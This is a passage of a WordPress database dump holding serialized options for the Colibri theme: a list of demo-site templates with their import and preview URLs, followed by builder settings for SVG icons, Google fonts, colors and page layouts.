PRO\";s:4:\"slug\";s:24:\"full-stack-developer-pro\";s:10:\"categories\";a:1:{i:0;s:9:\"portfolio\";}s:15:\"import_file_url\";s:101:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/full-stack-developer-pro/content.xml\";s:22:\"import_widget_file_url\";s:101:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/full-stack-developer-pro/widgets.wie\";s:26:\"import_customizer_file_url\";s:104:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/full-stack-developer-pro/customizer.dat\";s:24:\"import_preview_image_url\";s:90:\"https://static.colibriwp.com/templates-screenshots/full-stack-developer-pro/screenshot.jpg\";s:11:\"preview_url\";s:61:\"https://colibriwp-work.colibriwp.com/full-stack-developer-pro\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2020-12-15 06:17:33.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:88;a:11:{s:16:\"import_file_name\";s:19:\"Holistic Healer PRO\";s:4:\"slug\";s:19:\"holistic-healer-pro\";s:10:\"categories\";a:1:{i:0;s:8:\"services\";}s:15:\"import_file_url\";s:96:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/holistic-healer-pro/content.xml\";s:22:\"import_widget_file_url\";s:96:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/holistic-healer-pro/widgets.wie\";s:26:\"import_customizer_file_url\";s:99:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/holistic-healer-pro/customizer.dat\";s:24:\"import_preview_image_url\";s:85:\"https://static.colibriwp.com/templates-screenshots/holistic-healer-pro/screenshot.jpg\";s:11:\"preview_url\";s:56:\"https://colibriwp-work.colibriwp.com/holistic-healer-pro\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2021-01-19 15:54:19.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:89;a:11:{s:16:\"import_file_name\";s:10:\"Rental PRO\";s:4:\"slug\";s:10:\"rental-pro\";s:10:\"categories\";a:1:{i:0;s:12:\"sport-travel\";}s:15:\"import_file_url\";s:87:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/rental-pro/content.xml\";s:22:\"import_widget_file_url\";s:87:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/rental-pro/widgets.wie\";s:26:\"import_customizer_file_url\";s:90:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/rental-pro/customizer.dat\";s:24:\"import_preview_image_url\";s:76:\"https://static.colibriwp.com/templates-screenshots/rental-pro/screenshot.jpg\";s:11:\"preview_url\";s:47:\"https://colibriwp-work.colibriwp.com/rental-pro\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2020-10-05 12:12:27.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:90;a:11:{s:16:\"import_file_name\";s:13:\"Pub / Bar PRO\";s:4:\"slug\";s:11:\"pub-bar-pro\";s:10:\"categories\";a:1:{i:0;s:10:\"food-drink\";}s:15:\"import_file_url\";s:88:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/pub-bar-pro/content.xml\";s:22:\"import_widget_file_url\";s:88:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/pub-bar-pro/widgets.wie\";s:26:\"import_customizer_file_url\";s:91:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/pub-bar-pro/customizer.dat\";s:24:\"import_preview_image_url\";s:77:\"https://static.colibriwp.com/templates-screenshots/pub-bar-pro/screenshot.jpg\";s:11:\"preview_url\";s:48:\"https://colibriwp-work.colibriwp.com/pub-bar-pro\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2021-01-19 15:54:17.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:91;a:11:{s:16:\"import_file_name\";s:14:\"Motorcycle PRO\";s:4:\"slug\";s:14:\"motorcycle-pro\";s:10:\"categories\";a:1:{i:0;s:8:\"services\";}s:15:\"import_file_url\";s:91:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/motorcycle-pro/content.xml\";s:22:\"import_widget_file_url\";s:91:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/motorcycle-pro/widgets.wie\";s:26:\"import_customizer_file_url\";s:94:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/motorcycle-pro/customizer.dat\";s:24:\"import_preview_image_url\";s:80:\"https://static.colibriwp.com/templates-screenshots/motorcycle-pro/screenshot.jpg\";s:11:\"preview_url\";s:51:\"https://colibriwp-work.colibriwp.com/motorcycle-pro\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2021-01-19 15:53:53.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:92;a:11:{s:16:\"import_file_name\";s:18:\"Transportation PRO\";s:4:\"slug\";s:18:\"transportation-pro\";s:10:\"categories\";a:1:{i:0;s:8:\"business\";}s:15:\"import_file_url\";s:95:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/transportation-pro/content.xml\";s:22:\"import_widget_file_url\";s:95:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/transportation-pro/widgets.wie\";s:26:\"import_customizer_file_url\";s:98:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/transportation-pro/customizer.dat\";s:24:\"import_preview_image_url\";s:84:\"https://static.colibriwp.com/templates-screenshots/transportation-pro/screenshot.jpg\";s:11:\"preview_url\";s:55:\"https://colibriwp-work.colibriwp.com/transportation-pro\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2021-01-04 10:48:31.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:93;a:11:{s:16:\"import_file_name\";s:20:\"Language Courses PRO\";s:4:\"slug\";s:20:\"language-courses-pro\";s:10:\"categories\";a:1:{i:0;s:8:\"services\";}s:15:\"import_file_url\";s:97:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/language-courses-pro/content.xml\";s:22:\"import_widget_file_url\";s:97:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/language-courses-pro/widgets.wie\";s:26:\"import_customizer_file_url\";s:100:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/language-courses-pro/customizer.dat\";s:24:\"import_preview_image_url\";s:86:\"https://static.colibriwp.com/templates-screenshots/language-courses-pro/screenshot.jpg\";s:11:\"preview_url\";s:57:\"https://colibriwp-work.colibriwp.com/language-courses-pro\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2021-01-19 15:53:41.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:94;a:11:{s:16:\"import_file_name\";s:8:\"Taxi PRO\";s:4:\"slug\";s:8:\"taxi-pro\";s:10:\"categories\";a:1:{i:0;s:12:\"sport-travel\";}s:15:\"import_file_url\";s:85:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/taxi-pro/content.xml\";s:22:\"import_widget_file_url\";s:85:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/taxi-pro/widgets.wie\";s:26:\"import_customizer_file_url\";s:88:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/taxi-pro/customizer.dat\";s:24:\"import_preview_image_url\";s:74:\"https://static.colibriwp.com/templates-screenshots/taxi-pro/screenshot.jpg\";s:11:\"preview_url\";s:45:\"https://colibriwp-work.colibriwp.com/taxi-pro\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2021-01-19 15:53:39.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:95;a:11:{s:16:\"import_file_name\";s:11:\"Airclub PRO\";s:4:\"slug\";s:11:\"airclub-pro\";s:10:\"categories\";a:1:{i:0;s:12:\"sport-travel\";}s:15:\"import_file_url\";s:88:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/airclub-pro/content.xml\";s:22:\"import_widget_file_url\";s:88:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/airclub-pro/widgets.wie\";s:26:\"import_customizer_file_url\";s:91:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/airclub-pro/customizer.dat\";s:24:\"import_preview_image_url\";s:77:\"https://static.colibriwp.com/templates-screenshots/airclub-pro/screenshot.jpg\";s:11:\"preview_url\";s:48:\"https://colibriwp-work.colibriwp.com/airclub-pro\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2021-01-19 15:53:11.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:96;a:11:{s:16:\"import_file_name\";s:15:\"Car service PRO\";s:4:\"slug\";s:15:\"car-service-pro\";s:10:\"categories\";a:1:{i:0;s:8:\"services\";}s:15:\"import_file_url\";s:92:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/car-service-pro/content.xml\";s:22:\"import_widget_file_url\";s:92:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/car-service-pro/widgets.wie\";s:26:\"import_customizer_file_url\";s:95:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/car-service-pro/customizer.dat\";s:24:\"import_preview_image_url\";s:81:\"https://static.colibriwp.com/templates-screenshots/car-service-pro/screenshot.jpg\";s:11:\"preview_url\";s:52:\"https://colibriwp-work.colibriwp.com/car-service-pro\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2021-03-23 12:55:42.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:97;a:11:{s:16:\"import_file_name\";s:15:\"Christmas gifts\";s:4:\"slug\";s:15:\"christmas-gifts\";s:10:\"categories\";a:1:{i:0;s:9:\"community\";}s:15:\"import_file_url\";s:92:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/christmas-gifts/content.xml\";s:22:\"import_widget_file_url\";s:92:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/christmas-gifts/widgets.wie\";s:26:\"import_customizer_file_url\";s:95:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/christmas-gifts/customizer.dat\";s:24:\"import_preview_image_url\";s:81:\"https://static.colibriwp.com/templates-screenshots/christmas-gifts/screenshot.jpg\";s:11:\"preview_url\";s:52:\"https://colibriwp-work.colibriwp.com/christmas-gifts\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2020-12-17 16:25:20.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:98;a:11:{s:16:\"import_file_name\";s:16:\"Colibri Handyman\";s:4:\"slug\";s:16:\"colibri-handyman\";s:10:\"categories\";a:1:{i:0;s:8:\"services\";}s:15:\"import_file_url\";s:93:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/colibri-handyman/content.xml\";s:22:\"import_widget_file_url\";s:93:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/colibri-handyman/widgets.wie\";s:26:\"import_customizer_file_url\";s:96:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/colibri-handyman/customizer.dat\";s:24:\"import_preview_image_url\";s:82:\"https://static.colibriwp.com/templates-screenshots/colibri-handyman/screenshot.jpg\";s:11:\"preview_url\";s:53:\"https://colibriwp-work.colibriwp.com/colibri-handyman\";s:7:\"plugins\";a:2:{s:57:\"colibri-template-generator/colibri-template-generator.php\";N;s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2021-06-07 14:29:03.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:0;}}}','yes'),(349,'colibri-wp_companion_old_show_on_front','page','yes'),(350,'colibri-wp_companion_old_page_on_front','20','yes'),(351,'colibri_manual_create_pages','1','yes'),(352,'extend_builder_theme','a:16:{s:5:\"icons\";a:11:{s:17:\"brandico/facebook\";s:284:\"<svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"facebook\" viewBox=\"0 0 486.037 1007\"><path d=\"M124 1005V536H0V367h124V223C124 110 197 5 366 5c68 0 119 7 119 7l-4 158s-52-1-108-1c-61 0-71 28-71 75v123h183l-8 169H302v469H123\"/></svg>\";s:17:\"font-awesome/star\";s:395:\"<svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"star\" viewBox=\"0 0 1664 1896.0833\"><path d=\"M1664 647q0 22-26 48l-363 354 86 500q1 7 1 20 0 21-10.5 35.5T1321 1619q-19 0-40-12l-449-236-449 236q-22 12-40 12-21 0-31.5-14.5T301 1569q0-6 2-20l86-500L25 695Q0 668 0 647q0-37 56-46l502-73L783 73q19-41 49-41t49 41l225 455 502 73q56 9 56 46z\"/></svg>\";s:28:\"font-awesome/facebook-square\";s:410:\"<svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"facebook-square\" viewBox=\"0 0 1536 1896.0833\"><path d=\"M1248 128q119 0 203.5 84.5T1536 416v960q0 119-84.5 203.5T1248 1664h-188v-595h199l30-232h-229V689q0-56 23.5-84t91.5-28l122-1V369q-63-9-178-9-136 0-217.5 80T820 666v171H620v232h200v595H288q-119 0-203.5-84.5T0 1376V416q0-119 84.5-203.5T288 128h960z\"/></svg>\";s:27:\"font-awesome/twitter-square\";s:630:\"<svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"twitter-square\" viewBox=\"0 0 1536 1896.0833\"><path d=\"M1280 610q-56 25-121 34 68-40 93-117-65 38-134 51-61-66-153-66-87 0-148.5 61.5T755 722q0 29 5 48-129-7-242-65T326 550q-29 50-29 106 0 114 91 175-47-1-100-26v2q0 75 50 133.5t123 72.5q-29 8-51 8-13 0-39-4 21 63 74.5 104t121.5 42q-116 90-261 90-26 0-50-3 148 94 322 94 112 0 210-35.5t168-95 120.5-137 75-162T1176 746q0-18-1-27 63-45 105-109zm256-194v960q0 119-84.5 203.5T1248 1664H288q-119 0-203.5-84.5T0 1376V416q0-119 84.5-203.5T288 128h960q119 0 203.5 84.5T1536 416z\"/></svg>\";s:27:\"font-awesome/youtube-square\";s:1354:\"<svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"youtube-square\" viewBox=\"0 0 1536 1896.0833\"><path d=\"M919 1303v-157q0-50-29-50-17 0-33 16v224q16 16 33 16 29 0 29-49zm184-122h66v-34q0-51-33-51t-33 51v34zM532 915v70h-80v423h-74V985h-78v-70h232zm201 126v367h-67v-40q-39 45-76 45-33 0-42-28-6-17-6-54v-290h66v270q0 24 1 26 1 15 15 15 20 0 42-31v-280h67zm252 111v146q0 52-7 73-12 42-53 42-35 0-68-41v36h-67V915h67v161q32-40 68-40 41 0 53 42 7 21 7 74zm251 129v9q0 29-2 43-3 22-15 40-27 40-80 40-52 0-81-38-21-27-21-86v-129q0-59 20-86 29-38 80-38t78 38q21 29 21 86v76h-133v65q0 51 34 51 24 0 30-26 0-1 .5-7t.5-16.5V1281h68zM785 457v156q0 51-32 51t-32-51V457q0-52 32-52t32 52zm533 713q0-177-19-260-10-44-43-73.5t-76-34.5q-136-15-412-15-275 0-411 15-44 5-76.5 34.5T238 910q-20 87-20 260 0 176 20 260 10 43 42.5 73t75.5 35q137 15 412 15t412-15q43-5 75.5-35t42.5-73q20-84 20-260zM563 519l90-296h-75l-51 195-53-195h-78q7 23 23 69l24 69q35 103 46 158v201h74V519zm289 81V470q0-58-21-87-29-38-78-38-51 0-78 38-21 29-21 87v130q0 58 21 87 27 38 78 38 49 0 78-38 21-27 21-87zm181 120h67V350h-67v283q-22 31-42 31-15 0-16-16-1-2-1-26V350h-67v293q0 37 6 55 11 27 43 27 36 0 77-45v40zm503-304v960q0 119-84.5 203.5T1248 1664H288q-119 0-203.5-84.5T0 1376V416q0-119 84.5-203.5T288 128h960q119 0 203.5 84.5T1536 416z\"/></svg>\";s:25:\"font-awesome/vimeo-square\";s:540:\"<svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"vimeo-square\" viewBox=\"0 0 1536 1896.0833\"><path d=\"M1292 638q10-216-161-222-231-8-312 261 44-19 82-19 85 0 74 96-4 57-74 167t-105 110q-43 0-82-169-13-54-45-255-30-189-160-177-59 7-164 100l-81 72-81 72 52 67q76-52 87-52 57 0 107 179 15 55 45 164.5t45 164.5q68 179 164 179 157 0 383-294 220-283 226-444zm244-222v960q0 119-84.5 203.5T1248 1664H288q-119 0-203.5-84.5T0 1376V416q0-119 84.5-203.5T288 128h960q119 0 203.5 84.5T1536 416z\"/></svg>\";s:17:\"font-awesome/plus\";s:353:\"<svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"plus\" viewBox=\"0 0 1408 1896.0833\"><path d=\"M1408 736v192q0 40-28 68t-68 28H896v416q0 40-28 68t-68 28H608q-40 0-68-28t-28-68v-416H96q-40 0-68-28T0 928V736q0-40 28-68t68-28h416V224q0-40 28-68t68-28h192q40 0 68 28t28 68v416h416q40 0 68 28t28 68z\"/></svg>\";s:18:\"font-awesome/minus\";s:251:\"<svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"minus\" viewBox=\"0 0 1408 1896.0833\"><path d=\"M1408 736v192q0 40-28 68t-68 28H96q-40 0-68-28T0 928V736q0-40 28-68t68-28h1216q40 0 68 28t28 68z\"/></svg>\";s:25:\"font-awesome/chevron-left\";s:320:\"<svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"chevron-left\" viewBox=\"0 0 1289.1823 1896.0833\"><path d=\"M1171 301L640 832l531 531q19 19 19 45t-19 45l-166 166q-19 19-45 19t-45-19L173 877q-19-19-19-45t19-45L915 45q19-19 45-19t45 19l166 166q19 19 19 45t-19 45z\"/></svg>\";s:26:\"font-awesome/chevron-right\";s:317:\"<svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"chevron-right\" viewBox=\"0 0 1280 1896.0833\"><path d=\"M1107 877l-742 742q-19 19-45 19t-45-19l-166-166q-19-19-19-45t19-45l531-531-531-531q-19-19-19-45t19-45L275 45q19-19 45-19t45 19l742 742q19 19 19 45t-19 45z\"/></svg>\";s:17:\"font-awesome/bars\";s:439:\"<svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\"><path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"/></svg>\";}s:5:\"fonts\";a:2:{s:6:\"native\";a:0:{}s:6:\"google\";a:9:{s:4:\"Muli\";a:2:{s:7:\"weights\";a:14:{i:0;s:3:\"200\";i:1;s:9:\"200italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:3:\"400\";i:5;s:9:\"400italic\";i:6;s:3:\"600\";i:7;s:9:\"600italic\";i:8;s:3:\"700\";i:9;s:9:\"700italic\";i:10;s:3:\"800\";i:11;s:9:\"800italic\";i:12;s:3:\"900\";i:13;s:9:\"900italic\";}s:8:\"category\";s:10:\"sans-serif\";}s:9:\"Open Sans\";a:2:{s:7:\"weights\";a:10:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:3:\"400\";i:3;s:9:\"400italic\";i:4;s:3:\"600\";i:5;s:9:\"600italic\";i:6;s:3:\"700\";i:7;s:9:\"700italic\";i:8;s:3:\"800\";i:9;s:9:\"800italic\";}s:8:\"category\";s:10:\"sans-serif\";}s:16:\"Playfair Display\";a:2:{s:7:\"weights\";a:6:{i:0;s:3:\"400\";i:1;s:9:\"400italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";i:4;s:3:\"900\";i:5;s:9:\"900italic\";}s:8:\"category\";s:10:\"sans-serif\";}s:13:\"Abril Fatface\";a:3:{s:8:\"category\";s:7:\"display\";s:7:\"subsets\";a:2:{i:0;s:9:\"latin-ext\";i:1;s:5:\"latin\";}s:7:\"weights\";a:1:{i:0;s:3:\"400\";}}s:4:\"Acme\";a:3:{s:8:\"category\";s:10:\"sans-serif\";s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"weights\";a:1:{i:0;s:3:\"400\";}}s:10:\"Advent Pro\";a:3:{s:8:\"category\";s:10:\"sans-serif\";s:7:\"subsets\";a:3:{i:0;s:5:\"greek\";i:1;s:9:\"latin-ext\";i:2;s:5:\"latin\";}s:7:\"weights\";a:7:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"400\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";}}s:4:\"Alef\";a:3:{s:8:\"category\";s:10:\"sans-serif\";s:7:\"subsets\";a:2:{i:0;s:6:\"hebrew\";i:1;s:5:\"latin\";}s:7:\"weights\";a:2:{i:0;s:3:\"400\";i:1;s:3:\"700\";}}s:7:\"Arsenal\";a:3:{s:8:\"category\";s:10:\"sans-serif\";s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:10:\"vietnamese\";i:2;s:9:\"latin-ext\";i:3;s:12:\"cyrillic-ext\";i:4;s:5:\"latin\";}s:7:\"weights\";a:4:{i:0;s:3:\"400\";i:1;s:9:\"400italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";}}s:5:\"Baloo\";a:3:{s:8:\"category\";s:7:\"display\";s:7:\"subsets\";a:4:{i:0;s:10:\"vietnamese\";i:1;s:10:\"devanagari\";i:2;s:9:\"latin-ext\";i:3;s:5:\"latin\";}s:7:\"weights\";a:1:{i:0;s:3:\"400\";}}}}s:6:\"colors\";a:6:{i:0;s:7:\"#303e7a\";i:1;s:7:\"#f7e597\";i:2;s:7:\"#f66161\";i:3;s:7:\"#9ec9e2\";i:4;s:7:\"#f6f8fa\";i:5;s:7:\"#202a54\";}s:11:\"dummyChange\";s:0:\"\";s:10:\"typography\";a:0:{}s:6:\"global\";a:9:{s:7:\"content\";a:2:{s:8:\"template\";s:0:\"\";s:10:\"collection\";s:0:\"\";}s:6:\"titles\";a:10:{s:16:\"normalPageFormat\";s:7:\"{TITLE}\";s:17:\"normalResultsPage\";s:27:\"Search results for: {TITLE}\";s:9:\"errorPage\";s:22:\"Sorry! Page Not Found!\";s:10:\"singlePost\";s:7:\"{TITLE}\";s:15:\"categoryArchive\";s:16:\"Posts in {TITLE}\";s:13:\"authorArchive\";s:16:\"Posts in {TITLE}\";s:10:\"tagArchive\";s:16:\"Posts in {TITLE}\";s:11:\"yearArchive\";s:16:\"Posts in {TITLE}\";s:12:\"monthArchive\";s:16:\"Posts in {TITLE}\";s:10:\"dayArchive\";s:16:\"Posts in {TITLE}\";}s:6:\"vSpace\";a:2:{s:5:\"value\";i:20;s:4:\"unit\";s:2:\"px\";}s:6:\"hSpace\";a:2:{s:5:\"value\";i:20;s:4:\"unit\";s:2:\"px\";}s:14:\"sectionSpacing\";a:2:{s:5:\"value\";i:90;s:4:\"unit\";s:2:\"px\";}s:10:\"transition\";a:1:{s:8:\"duration\";a:2:{s:5:\"value\";s:3:\"0.5\";s:4:\"unit\";s:1:\"s\";}}s:9:\"templates\";a:2:{s:4:\"blog\";a:2:{s:5:\"style\";a:1:{s:11:\"descendants\";a:2:{s:7:\"section\";a:1:{s:7:\"padding\";a:2:{s:3:\"top\";a:1:{s:5:\"value\";s:2:\"90\";}s:6:\"bottom\";a:1:{s:5:\"value\";s:2:\"90\";}}}s:13:\"sidebar-right\";a:3:{s:11:\"columnWidth\";a:2:{s:4:\"type\";s:6:\"custom\";s:6:\"custom\";a:2:{s:5:\"value\";i:25;s:4:\"unit\";s:1:\"%\";}}s:8:\"maxWidth\";a:2:{s:5:\"value\";i:25;s:4:\"unit\";s:1:\"%\";}s:5:\"media\";a:2:{s:6:\"mobile\";a:2:{s:11:\"columnWidth\";a:2:{s:4:\"type\";s:6:\"custom\";s:6:\"custom\";a:2:{s:5:\"value\";s:3:\"100\";s:4:\"unit\";s:1:\"%\";}}s:8:\"maxWidth\";a:2:{s:5:\"value\";s:3:\"100\";s:4:\"unit\";s:1:\"%\";}}s:6:\"tablet\";a:2:{s:11:\"columnWidth\";a:2:{s:4:\"type\";s:6:\"custom\";s:6:\"custom\";a:2:{s:4:\"unit\";s:1:\"%\";s:5:\"value\";s:5:\"33.33\";}}s:8:\"maxWidth\";a:2:{s:4:\"unit\";s:1:\"%\";s:5:\"value\";s:5:\"33.33\";}}}}}}s:5:\"props\";a:1:{s:11:\"descendants\";a:2:{s:3:\"row\";a:2:{s:6:\"layout\";a:2:{s:13:\"horizontalGap\";i:2;s:11:\"verticalGap\";i:2;}s:14:\"layout-classes\";a:3:{s:5:\"unset\";b:1;s:11:\"outer_class\";a:1:{i:0;s:16:\"gutters-row-lg-2\";}s:11:\"inner_class\";a:1:{i:0;s:16:\"gutters-col-lg-2\";}}}s:7:\"section\";a:1:{s:8:\"sidebars\";a:1:{s:5:\"right\";b:1;}}}}}s:11:\"woocommerce\";a:2:{s:5:\"props\";a:1:{s:11:\"descendants\";a:1:{s:7:\"section\";a:1:{s:8:\"sidebars\";a:1:{s:4:\"left\";b:1;}}}}s:5:\"style\";a:1:{s:11:\"descendants\";a:1:{s:12:\"sidebar-left\";a:1:{s:11:\"columnWidth\";a:1:{s:6:\"custom\";a:2:{s:4:\"unit\";s:1:\"%\";s:5:\"value\";i:25;}}}}}}}s:13:\"multilanguage\";a:2:{s:5:\"props\";a:2:{s:7:\"enabled\";b:1;s:4:\"type\";s:8:\"dropdown\";}s:5:\"style\";a:4:{s:11:\"descendants\";a:2:{s:9:\"container\";a:3:{s:10:\"background\";a:1:{s:5:\"color\";s:5:\"white\";}s:3:\"top\";a:2:{s:4:\"unit\";s:2:\"px\";s:5:\"value\";i:80;}s:6:\"border\";a:2:{s:3:\"top\";a:1:{s:6:\"radius\";a:2:{s:4:\"left\";a:2:{s:4:\"unit\";s:2:\"px\";s:5:\"value\";i:4;}s:5:\"right\";a:2:{s:4:\"unit\";s:2:\"px\";s:5:\"value\";i:0;}}}s:6:\"bottom\";a:1:{s:6:\"radius\";a:2:{s:4:\"left\";a:2:{s:4:\"unit\";s:2:\"px\";s:5:\"value\";i:4;}s:5:\"right\";a:2:{s:4:\"unit\";s:2:\"px\";s:5:\"value\";i:0;}}}}}s:5:\"flags\";a:1:{s:7:\"padding\";a:4:{s:3:\"top\";a:2:{s:4:\"unit\";s:2:\"px\";s:5:\"value\";i:14;}s:5:\"right\";a:2:{s:4:\"unit\";s:2:\"px\";s:5:\"value\";i:18;}s:6:\"bottom\";a:2:{s:4:\"unit\";s:2:\"px\";s:5:\"value\";i:14;}s:4:\"left\";a:2:{s:4:\"unit\";s:2:\"px\";s:5:\"value\";i:18;}}}}s:10:\"background\";a:1:{s:5:\"color\";s:5:\"white\";}s:3:\"top\";a:2:{s:4:\"unit\";s:2:\"px\";s:5:\"value\";i:80;}s:6:\"border\";a:2:{s:3:\"top\";a:1:{s:6:\"radius\";a:2:{s:4:\"left\";a:2:{s:4:\"unit\";s:2:\"px\";s:5:\"value\";i:4;}s:5: